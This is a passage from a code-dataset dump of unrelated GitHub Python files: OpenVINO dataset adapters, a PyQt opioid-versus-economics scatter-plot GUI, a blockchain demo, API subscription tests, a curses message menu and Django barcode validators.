Create a `BaseDatasetAdapter` subclass\n 2. Find the corresponding annotation converter (subclass of `BaseFormatConverter`) in\n http://github.com/opencv/open_model_zoo/tree/master/tools/accuracy_checker/accuracy_checker/annotation_converters\n 3. Set the `converter` attribute of the subclass to the name of the corresponding annotation converter\n (The name is contained in the `__provider__` attribute of the annotation converter class).\n 4. Implement `recognize()`\n 5. Implement `get_data_source()`\n 6. Implement `get_specific_params()`\n \"\"\"\n\n converter = None\n\n def __init__(self, dataset_path: str):\n self.dataset_path = Path(dataset_path)\n if not self.dataset_path.exists():\n raise FileNotFoundError(self.dataset_path)\n if not self.dataset_path.is_dir():\n raise NotADirectoryError(self.dataset_path)\n\n self.params = self.get_params()\n\n @staticmethod\n def recognize(dataset_path: str) -> bool:\n \"\"\"Check if the `dataset_path` contains a dataset of type related to this subclass.\"\"\"\n raise NotImplementedError\n\n def get_data_source(self) -> Path:\n \"\"\"Return absolute path to the directory containing images.\"\"\"\n raise NotImplementedError\n\n def get_specific_params(self) -> dict:\n \"\"\"\n Return only the annotation conversion params specific for this type of dataset.\n\n Find the parameters in the `parameters()` method of the corresponding annotation converter class.\n \"\"\"\n raise NotImplementedError\n\n def get_params(self) -> dict:\n \"\"\"Return all annotation conversion params.\"\"\"\n params = self.get_specific_params()\n params.update({\n 'converter': self.converter,\n 'images_dir': self.get_data_source(), # Used by Accuracy Checker for content checking.\n })\n return params\n\n def abs_path(self, relative_path: str) -> Path:\n absolute_path = self.dataset_path / relative_path\n if not absolute_path.exists():\n raise InconsistentDatasetError('Cannot find {}'.format(relative_path))\n return absolute_path\n\n def to_annotation(self) -> dict:\n serializable_params = {key: str(value) for key, value in self.params.items()}\n return {\n 'data_source': str(self.get_data_source()),\n 'annotation': Annotation(**serializable_params),\n }\n\n\n@register_dataset_adapter(DatasetTypesEnum.imagenet)\nclass ImagenetDatasetAdapter(BaseDatasetAdapter):\n converter = 'imagenet'\n\n @staticmethod\n def recognize(dataset_path: str) -> bool:\n content = list(Path(dataset_path).iterdir())\n no_subdirs = all(path.is_file() for path in content)\n has_txt = any(path.suffix.lower() == '.txt' for path in content)\n return no_subdirs and has_txt\n\n def get_data_source(self) -> Path:\n return self.dataset_path\n\n def get_specific_params(self) -> dict:\n return {\n 'annotation_file': self.get_annotation_file_path(),\n }\n\n def get_annotation_file_path(self) -> Path:\n annotation_file_paths = [path for path in self.dataset_path.iterdir() if self.is_imagenet_annotation_file(path)]\n if not annotation_file_paths:\n raise InconsistentDatasetError('Cannot find annotation file.')\n if len(annotation_file_paths) > 1:\n raise InconsistentDatasetError(\n 'Too many annotation files: {}.'.format([path.name for path in annotation_file_paths]))\n return annotation_file_paths[0]\n\n @staticmethod\n def is_imagenet_annotation_file(path: Path):\n if not path.is_file() or path.suffix.lower() != '.txt':\n return False\n with open(str(path)) as file:\n return all(re.match(r'^\\S+[ \\t]+[0-9]+$', line.rstrip(' \\t\\r\\n')) for line in file if line.strip('\\r\\n'))\n\n\n@register_dataset_adapter(DatasetTypesEnum.voc_object_detection)\nclass VOCDetectionDatasetAdapter(BaseDatasetAdapter):\n converter = 'voc_detection'\n\n @staticmethod\n def recognize(dataset_path: str) -> bool:\n return (Path(dataset_path) / VOC_ROOT_FOLDER).is_dir()\n\n def get_data_source(self) -> Path:\n return self.abs_path('VOCdevkit/VOC{}/JPEGImages'.format(self.voc_version))\n\n def get_specific_params(self) -> dict:\n return {\n 'imageset_file': self.get_imageset_file(),\n 'annotations_dir': self.abs_path('VOCdevkit/VOC{}/Annotations'.format(self.voc_version)),\n }\n\n def __init__(self, *args, **kwargs):\n self._voc_version = None\n super().__init__(*args, **kwargs)\n\n @property\n def voc_version(self):\n if not self._voc_version:\n vocdevkit_dir = self.abs_path('VOCdevkit')\n voc_version_dirnames = [d.name for d in vocdevkit_dir.iterdir() if d.name.startswith('VOC') and d.is_dir()]\n if not voc_version_dirnames:\n raise InconsistentDatasetError(\n 'Cannot find \"VOCdevkit/VOC\" directory.')\n if len(voc_version_dirnames) > 1:\n raise InconsistentDatasetError(\n 'Too many \"VOCdevkit/VOC\" directories: {}.'.format(voc_version_dirnames))\n self._voc_version = voc_version_dirnames[0].split('VOC')[1]\n return self._voc_version\n\n def get_imageset_file(self):\n path_to_dir = self.abs_path('VOCdevkit/VOC{}/ImageSets/Main'.format(self.voc_version))\n for filename in ('test.txt', 'val.txt', 'train.txt'):\n path = path_to_dir / filename\n if path.is_file():\n return path\n raise InconsistentDatasetError('Cannot find an imageset file for this dataset.')\n","repo_name":"nathanbangwa243/VLinder-AI","sub_path":"intel/openvino_2019.3.376/deployment_tools/tools/workbench/app/main/jobs/utils/yml_templates/dataset_adapters.py","file_name":"dataset_adapters.py","file_ext":"py","file_size_in_byte":6202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"4449234706","text":"from pandas import DataFrame\nimport plotly.express as px\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtWidgets, QtWebEngineWidgets\nimport numpy as np\nimport json\nimport pandas as pd\n\nlaborstats_data = json.load(open(\"HTMLLaborStatistics.json\", 'r'))\nnotinlaborforce = laborstats_data['Not in Labor Force Percent']\nemployed = laborstats_data['Employed Percent']\nunemployment = laborstats_data['Unemployment Percent']\n\neduc_data = json.load(open(\"EducationAttainment.json\", 'r'))\nlessthan9th = educ_data['Less Than 9th Percent']\nhighschool = educ_data['High School Graduate Percent']\nbachelor = educ_data['Bachelor Degree Percent']\n\nwith open(\"economic_data.json\") as econ:\n econ_dataframe = pd.read_json(econ)\n econ_dataframe = econ_dataframe.transpose()\n econ_dataframe.sort_index(inplace = True, axis = 0)\n #print(econ_dataframe.loc[\"Mcintosh\", :])\n POP = list(econ_dataframe[\" Population (Persons) (Number Of Persons)\"])\n PCNE = list(econ_dataframe[\" Per Capita Net Earnings (Dollars)\"])\n NEBPR = list(econ_dataframe[\" Net Earnings By Place Of Residence (Thousands Of Dollars)\"])\n PCPI = list(econ_dataframe[\" Per Capita Personal Income (Dollars)\"])\n PCPCTR = list(econ_dataframe[\" Per Capita Personal Current Transfer Receipts (Dollars)\"])\n PCIMB = list(econ_dataframe[\" Per Capita Income Maintenance Benefits (Dollars)\"])\n PCUIC = list(econ_dataframe[\" Per Capita Unemployment Insurance Compensation (Dollars)\"])\n PCRO = list(econ_dataframe[\" Per Capita Retirement And Other (Dollars)\"])\n\nopioiddata = json.load(open(\"opioid_dat.json\", 'r'))\nopioid = {}\nfor key in opioiddata:\n opioid[key] = opioiddata[key]['total_claims']\n\npopdata = json.load(open(\"economic_data.json\", 'r'))\npop = {}\ncounties = []\n\nfor key in popdata:\n pop[key] = popdata[key][' Population (Persons) (Number Of Persons)']\n counties.append(key)\ncounties.sort()\nopioidrate = []\nfor key in counties:\n if opioid[key] and pop[key]:\n opioidrate.append(opioid[key]/pop[key])\n else:\n opioidrate.append(0)\n\nclass MainWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Scatter Graph Generator\")\n\n self.label1 = QLabel(\"X-Axis:\")\n self.label1.setAlignment(QtCore.Qt.AlignCenter)\n self.label2 = QLabel(\"Y-Axis:\")\n self.label2.setAlignment(QtCore.Qt.AlignCenter)\n\n self.cb = QComboBox()\n self.cb.addItems([\"\",\"Unemployment Rate\", \"Not in Labor Force Rate\", \"Employed Rate\", \"Percentage with Less than 9th Grade Education\", \"Percentage that Graduated Highschool\"])\n self.cb.addItems([\"Percentage with Bachelor's Degree\", \"Per Capita Net Earnings (Dollars)\", \"Net Earnings By Place Of Residence (Thousands Of Dollars)\", \"Per Capita Personal Income (Dollars)\"])\n self.cb.addItems([\"Per Capita Personal Current Transfer Receipts (Dollars)\", \"Per Capita Income Maintenance Benefits (Dollars)\", \"Per Capita Unemployment Insurance Compensation (Dollars)\", \"Per Capita Retirement And Other (Dollars)\"])\n self.cb.activated[str].connect(self.generate)\n\n self.cb1 = QComboBox()\n self.cb1.addItems([\"\", \"Opioid Prescription Rate \"])\n self.cb1.activated[str].connect(self.generate)\n\n self.button = QtWidgets.QPushButton('Generate Graph!', self)\n self.browser = QtWebEngineWidgets.QWebEngineView(self)\n self.infobutton = QPushButton(\"Instructions\")\n\n\n layout = QVBoxLayout()\n\n vlayout = QVBoxLayout()\n vlayout.addWidget(self.button, alignment=QtCore.Qt.AlignHCenter)\n vlayout.addWidget(self.browser)\n self.button.clicked.connect(self.creategraph)\n self.resize(1000,800)\n\n hbox = QHBoxLayout()\n hbox.addWidget(self.label1)\n hbox.addWidget(self.cb)\n\n hbox2 = QHBoxLayout()\n hbox2.addWidget(self.label2)\n hbox2.addWidget(self.cb1)\n\n hbox4 = QHBoxLayout()\n hbox4.addWidget(self.infobutton)\n self.infobutton.clicked.connect(self.info)\n\n layout.addLayout(hbox4)\n layout.addLayout(hbox)\n layout.addLayout(hbox2)\n layout.addLayout(vlayout)\n\n self.setLayout(layout)\n\n def generate(self):\n if self.cb.currentText() and self.cb1.currentText():\n self.button.setEnabled(True)\n self.button.clicked.connect(self.creategraph)\n else:\n pass\n\n def creategraph(self):\n if self.cb.currentText() == \"\" or self.cb1.currentText()==\"\":\n self.button.setEnabled(False)\n pass\n elif self.cb.currentText() == \"Employed Rate\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"employed\":employed, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['employed'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Employed Percentage v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Employed Percentage\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Unemployment Rate\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"unemployment\":unemployment, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['unemployment'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Unemployment Rate (%) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Unemployment Rate (%)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Not in Labor Force Rate\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"notinlaborforce\":notinlaborforce, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['notinlaborforce'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Not in Labor Force Rate (%) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Not in Labor Force Rate (%)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Percentage with Less than 9th Grade Education\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"lessthan9th\":lessthan9th, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['lessthan9th'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Percentage with Less than 9th Grade Education (%) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Percentage with Less than 9th Grade Education (%)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Percentage that Graduated Highschool\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"highschool\":highschool, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['highschool'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Percentage that Graduated Highschool (%) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Percentage that Graduated Highschool (%)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Percentage with Bachelor's Degree\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"bachelor\":bachelor, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['bachelor'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Percentage with Bachelor's Degree (%) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Percentage with Bachelor's Degree (%)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Per Capita Net Earnings (Dollars)\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"PCNE\":PCNE, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['PCNE'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Per Capita Net Earnings (Dollars) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Per Capita Net Earnings (Dollars)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Net Earnings By Place Of Residence (Thousands Of Dollars)\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"NEBPR\":NEBPR, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['NEBPR'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Net Earnings By Place Of Residence (Thousands Of Dollars) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Net Earnings By Place Of Residence (Thousands Of Dollars)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Per Capita Personal Income (Dollars)\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"PCPI\":PCPI, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['PCPI'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Per Capita Personal Income (Dollars) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Per Capita Personal Income (Dollars)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Per Capita Personal Current Transfer Receipts (Dollars)\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"PCPCTR\":PCPCTR, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['PCPCTR'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Per Capita Personal Current Transfer Receipts (Dollars) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Per Capita Personal Current Transfer Receipts (Dollars)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Per Capita Income Maintenance Benefits (Dollars)\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"PCIMB\":PCIMB, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['PCIMB'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Per Capita Income Maintenance Benefits (Dollars) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Per Capita Income Maintenance Benefits (Dollars)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Per Capita Unemployment Insurance Compensation (Dollars)\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"PCUIC\":PCUIC, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['PCUIC'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Per Capita Unemployment Insurance Compensation (Dollars) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Per Capita Unemployment Insurance Compensation (Dollars)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n elif self.cb.currentText() == \"Per Capita Retirement And Other (Dollars)\":\n df = pd.DataFrame({\"opioidrate\":opioidrate, \"PCRO\":PCRO, 'counties':counties},index=counties)\n df = df[df[\"opioidrate\"] != 0]\n\n a = np.array(df['PCRO'])\n b = np.array(df['opioidrate'])\n c = np.array(df['counties'])\n\n df = px.data.tips()\n fig = px.scatter(x = a, y = b, trendline=\"ols\", title=\"Per Capita Retirement And Other (Dollars) v.s. # of Prescriptions Per Person\", \\\n labels={\"x\": \"Per Capita Retirement And Other (Dollars)\",\"y\": \"# of Prescriptions Per Person\"}, hover_name=c, opacity=0.7)\n fig.data[1].update(line_color='red')\n self.browser.setHtml(fig.to_html(include_plotlyjs='cdn'))\n\n\n def info(self):\n self.messbox = QMessageBox()\n self.messbox.setIcon(QMessageBox.Information)\n self.messbox.setText(\"Instructions\")\n self.messbox.setInformativeText(\"After selecting the axis values, press 'Generate Graph!' to create the desired scatter graph. Please wait as it takes a few seconds for the graph to load :)\")\n self.messbox.exec()\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = MainWindow()\n main.show()\n sys.exit(app.exec_())\n\n\"\"\"\npython GUI.py\n\"\"\"\n","repo_name":"pneo19/ga-opioid-epidemic-project","sub_path":"PhaseII.py","file_name":"PhaseII.py","file_ext":"py","file_size_in_byte":15638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36425240644","text":"from BlockchainClass import Blockchain\n\nnew_transactions = [{'amount': '30', 'sender':'alice', 'receiver':'bob'},\n \t{'amount': '55', 'sender':'bob', 'receiver':'alice'}]\n\nmy_blockchain = Blockchain()\n\nmy_blockchain.add_block(new_transactions)\nmy_blockchain.print_blocks()\nmy_blockchain.chain[1].transactions = \"fake_transactions\"\nmy_blockchain.print_blocks()\nmy_blockchain.validate_chain()\n\nnew_transactions = [{'amount': '30', 'sender': 'alice', 'receiver': 'bob'},\n {'amount': '55', 'sender': 'bob', 'receiver': 'alice'}]\n\n# import sha256\nfrom hashlib import sha256\n\n# sets the amount of leading zeros that must be found in the hash produced by the nonce\ndifficulty = 2\nnonce = 0\n# creating the proof\n\"\"\"string = str(nonce) + str(new_transactions)\nproof = sha256(string.encode()).hexdigest()\n# printing proof\nprint(proof)\"\"\"\n\n\"\"\"# finding a proof that has 2 leading zeros\ntest = False\nwhile not test:\n string = str(nonce) + str(new_transactions)\n proof = sha256(string.encode()).hexdigest()\n needed_zeros = True\n for i in range(difficulty):\n if proof[i] != \"0\":\n #print(\"Index \" + str(i) + \" ist nicht 0!\")\n needed_zeros = False\n break\n if needed_zeros == True:\n test = True\n print(nonce)\n print(proof)\n nonce = nonce + 1\"\"\"\n","repo_name":"jonasjuenemann/PyProjects","sub_path":"BlockChain/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11884725654","text":"from httpx import AsyncClient\n\nfrom backend_amirainvest_com.api.app import app\n\nfrom ..config import AUTH_HEADERS\n\n\nasync def test_not_authenticated_get_user_subscriptions():\n async with AsyncClient(app=app, base_url=\"http://test\") as async_client:\n response = await async_client.get(\"/user_subscriptions/subscriber\")\n assert response.status_code == 403\n assert response.json() == {\"detail\": \"Not authenticated\"}\n\n\nasync def test_get_subscriptions_for_subscriber(factory, mock_auth):\n subscriber = await factory.gen(\"users\")\n subscriber_id = subscriber[\"users\"].id\n creator = await factory.gen(\"users\")\n await factory.gen(\n \"user_subscriptions\",\n {\"user_subscriptions\": {\"creator_id\": creator[\"users\"].id, \"subscriber_id\": subscriber_id}},\n )\n await mock_auth(subscriber_id)\n async with AsyncClient(app=app, base_url=\"http://test\") as async_client:\n response = await async_client.get(\"/user_subscriptions/subscriber\", headers=AUTH_HEADERS)\n assert response.status_code == 200\n assert str(creator[\"users\"].id) in [x[\"creator_id\"] for x in response.json()]\n\n\nasync def test_get_subscriptions_for_creator(factory, mock_auth):\n subscriber = await factory.gen(\"users\")\n creator = await factory.gen(\"users\")\n creator_id = creator[\"users\"].id\n await factory.gen(\n \"user_subscriptions\",\n {\"user_subscriptions\": {\"creator_id\": creator_id, \"subscriber_id\": subscriber[\"users\"].id}},\n )\n await mock_auth(creator_id)\n async with AsyncClient(app=app, base_url=\"http://test\") as async_client:\n response = await async_client.get(\"/user_subscriptions/creator\", headers=AUTH_HEADERS)\n assert response.status_code == 200\n assert str(subscriber[\"users\"].id) in [x[\"subscriber_id\"] for x in response.json()]\n\n\nasync def test_create_subscription(factory, mock_auth):\n subscriber = await factory.gen(\"users\")\n creator = await factory.gen(\"users\")\n subscriber_id = subscriber[\"users\"].id\n await mock_auth(subscriber_id)\n async with AsyncClient(app=app, base_url=\"http://test\") as async_client:\n response = await async_client.post(\n \"/user_subscriptions/subscribe\",\n headers=AUTH_HEADERS,\n params={\n \"creator_id\": str(creator[\"users\"].id),\n },\n )\n assert response.status_code == 200\n","repo_name":"amirainvest/amirainvest_com","sub_path":"src/backend_amirainvest_com/test/unit/backend_amirainvest_com/api/routers/test_user_subscriptions.py","file_name":"test_user_subscriptions.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"8461719412","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom time import sleep\nimport curses, os\nimport messageChecker\n\nscreen = curses.initscr()\ncurses.noecho() \ncurses.cbreak() \ncurses.start_color() \nscreen.keypad(1)\n\n\ncurses.init_pair(1,curses.COLOR_BLACK, curses.COLOR_WHITE) \nh = curses.color_pair(1) \nn = curses.A_NORMAL \n\nMENU = \"menu\"\nCOMMAND = \"command\"\nEXITMENU = \"exitmenu\"\nMID = \"m\" #personal convers /!\\ not only\n_ID = \"i\" #group\nINFO = 'info' \nEXT = 'extend'\n\n\nmenu_data = {\n 'title': \"Message Checker\", 'type': MENU, EXT : '', 'subtitle': \"Please select an option...\",\n 'options':[\n { 'title': \"Unread messages\", 'type': MENU, EXT : '', 'subtitle': \"Please select an option...\", #\n 'options': [\n { 'title': \"author: \", 'type': INFO, EXT : '', 'ID': 'uid', 'nbUnread' : 'x' },\n ]\n },\n { 'title': \"Sent messages\", 'type': MENU, EXT : '', 'subtitle': \"Please select an option...\", #\n 'options': [\n { 'title': \"author: \", 'type': INFO, EXT : '', 'ID': 'uid' },\n ]\n },\n { 'title': \"Send new message\", 'type': COMMAND, EXT : '', 'command': 'NewMessage' }, #\n ]\n}\n\nmessage_f = {\n 'title' : \": \", 'type' : INFO, EXT : '', 'timestamp' : 'timestamp', 'body' : 'body', 'subtitle': \"Please select an option...\", \n 'options' : [\n { 'title' : 'Mark as read', 'type' : COMMAND, EXT : '', 'command' : 'MarkAsRead'},\n { 'title' : 'Reply', 'type' : COMMAND, EXT : '', 'command' : 'Reply'},\n { 'title' : 'Decrypt', 'type' : COMMAND, EXT : '', 'command' : 'Decrypt', 'body' : 'body', 'timestamp' : 'timestamp'},\n { 'title' : 'Reply with encription', 'type' : COMMAND, EXT : '', 'command' : 'cryptReply'},\n ]\n}\n\ndef fillMenu(menuFormat=menu_data):\n \n allMess = messageChecker.getUnread()\n for key in allMess:\n if int(key['nbUnread']) > 0:\n menuFormat['options'][0]['options'].append(key)\n\n#Menu\n#/!\\ not dynamic yet\ndef runmenu(menu, parent):\n\n if parent is None:\n lastoption = \"Exit\"\n else:\n lastoption = \"Return to %s menu\" % parent['title']\n\n optioncount = len(menu['options']) \n pos=0 \n oldpos=None \n x = None \n \n while x !=ord('\\n'):\n if pos != oldpos:\n oldpos = pos\n screen.border(0)\n if menu[EXT] == 'body':\n screen.addstr(2,2, menu['body'], curses.A_STANDOUT)\n else:\n screen.addstr(2,2, menu['title'], curses.A_STANDOUT) \n screen.addstr(4,2, menu['subtitle'], curses.A_BOLD) \n for index in range(optioncount):\n textstyle = n\n if pos==index:\n textstyle = h\n screen.addstr(5+index,4, \"%d - %s\" % (index+1, menu['options'][index]['title']), textstyle)\n textstyle = n\n if pos==optioncount:\n textstyle = h\n screen.addstr(5+optioncount,4, \"%d - %s\" % (optioncount+1, lastoption), textstyle)\n screen.refresh()\n \n x = screen.getch() \n \n if x >= ord('1') and x <= ord(str(optioncount+1)[0]):\n pos = x - ord('0') - 1 \n elif x == 258: \n if pos < optioncount:\n pos += 1\n else: pos = 0\n elif x == 259: \n if pos > 0:\n pos += -1\n else: pos = optioncount\n\n return pos\n\n\n#Selected checker\ndef processmenu(menu, parent=None):\n\n optioncount = len(menu['options'])\n exitmenu = False\n while not exitmenu:\n getin = runmenu(menu, parent)\n if getin == optioncount:\n exitmenu = True\n elif menu['options'][getin]['type'] == MENU:\n screen.clear()\n if menu['options'][getin][EXT] == 'messages':\n menu['options'][getin]['options'] = messageChecker.organizeMess(menu['options'][getin]['ID'])\n processmenu(menu['options'][getin], menu)\n screen.clear()\n elif menu['options'][getin]['type'] == EXITMENU:\n exitmenu = True\n elif menu['options'][getin]['type'] == MID:\n x = None\n screen.clear()\n messages = messageChecker.readMess(menu['options'][getin]['ID'])\n fi = ''\n for mess in messages:\n mess = mess.encode('ascii', 'ignore').decode('ascii')\n fi += mess + '\\n\\n'\n screen.addstr(2,2, fi, curses.A_STANDOUT) \n while x !=ord('\\n'):\n x = screen.getch()\n screen.clear()\n\n# Main program\nfillMenu(menu_data)\nprocessmenu(menu_data)\ncurses.endwin()\nos.system('clear')\n","repo_name":"Es-so/Util_tools","sub_path":"test_AUTO_FB_LOGGER_and_SEND_MESS/messMenu.py","file_name":"messMenu.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40325926112","text":"from django.conf import settings\nimport requests\nimport jwt\nfrom barcode_pattern_app.models import (BarcodePatternMaster,BarcodeShopMapping)\nfrom barcode_pattern_app.serializers import (\nBarcodePatternMasterSerializer,BarcodeShopMappingSerializer)\n\ndef check_code_type_is_present(code_type,check_flag,id):\n try:\n if type(code_type) == str and code_type.isnumeric() == False:\n return False,\"Code type must be an number\"\n if check_flag == 'insert':\n queryParams = BarcodePatternMaster.objects.filter(code_type=int(code_type),is_active=True,is_deleted=False).first()\n if check_flag == 'update':\n queryParams = BarcodePatternMaster.objects.filter(code_type=int(code_type),is_active=True,is_deleted=False).exclude(id=id).first()\n if queryParams:\n barcodePatternMasterSerializer = BarcodePatternMasterSerializer(queryParams)\n if len(barcodePatternMasterSerializer.data) != 0:\n return False, \"Code type is already present\"\n else:\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef check_pattern_sample_is_present(pattern_sample,check_flag,id):\n try:\n if check_flag == 'insert':\n queryParams = BarcodePatternMaster.objects.filter(pattern_sample=pattern_sample,is_active=True,is_deleted=False).first()\n if check_flag == 'update':\n queryParams = BarcodePatternMaster.objects.filter(pattern_sample=pattern_sample,is_active=True,is_deleted=False).exclude(id=id).first()\n if queryParams:\n barcodePatternMasterSerializer = BarcodePatternMasterSerializer(queryParams)\n if len(barcodePatternMasterSerializer.data) != 0:\n return False, \"Pattern sample is already present\"\n else:\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef check_code_description(code_description):\n try:\n if len(code_description)>500:\n return False, \"Code description should be 500 character\"\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef check_pn_bt_bs(request_string,request_key):\n try:\n if len(request_string)>250:\n return False, request_key+\" should be 250 character\"\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef check_barcode_length(barcode_length,barcode_sample):\n try:\n if type(barcode_length) == str and barcode_length.isnumeric() == False:\n return False, \"barcode length should be numeric\"\n if int(barcode_length) != len(barcode_sample):\n return False, \"barcode length and barcode sample length are not same\"\n return True,\"\"\n except Exception as 